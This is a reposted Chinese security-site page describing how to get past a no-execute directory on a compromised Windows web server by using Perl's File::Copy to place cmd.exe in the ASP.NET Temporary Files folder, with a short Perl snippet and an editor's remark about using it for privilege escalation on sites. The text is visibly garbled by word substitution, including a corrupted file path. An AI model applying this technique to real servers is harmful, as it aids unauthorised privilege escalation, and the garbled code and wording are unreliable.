|
|
|
联系客服020-83701501

利用PERL突破目录无执行权限

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
把持PERL突破目录无履行权限

老鸟飞过。
进入正题.

目的可写目录无履行权限.装有PERL。有运转权限。但system,exec,,这几个函数不有权限。

留神PERL并不是系统权限。而是继承的nt authoritynetwork service权限,以是默认比网站权限略的高点。

把持perl的copy 函数

  1. use File::Copy;
  2. $a=’d:网站cmd.exe’;
  3. $ac=’c:/windows/Microsoft.NET/Framework/v2.0.50727/Temporary ASP.NET Files/root/奸淫*奸淫/奸淫*奸淫*/hash/cmd.exe’;
  4. copy($a, $ac) or die “Copy failed: $!”;
  5. print ‘ok’;

91ri.org:小编手上有个站提了良久没提下,看到此文章想起早年的站上的环境,目测也许用此法子法度模范试试 分享一下 做个参考吧 等于有定然领域性 呵呵 闪 提权去。

若是列位手上另有啥站提不下 正纠结着 也许参考我们网站的提权版块 也许会有引导哟! 点此进入:提权

转自http://hi.baidu.com/nfxwjevarpcklrr/item/9a1c3330af5e00f496f88dc0

由网络安全攻防研究室(www.91ri.org)音讯安全小组搜集整顿。

数安新闻+更多

证书相关+更多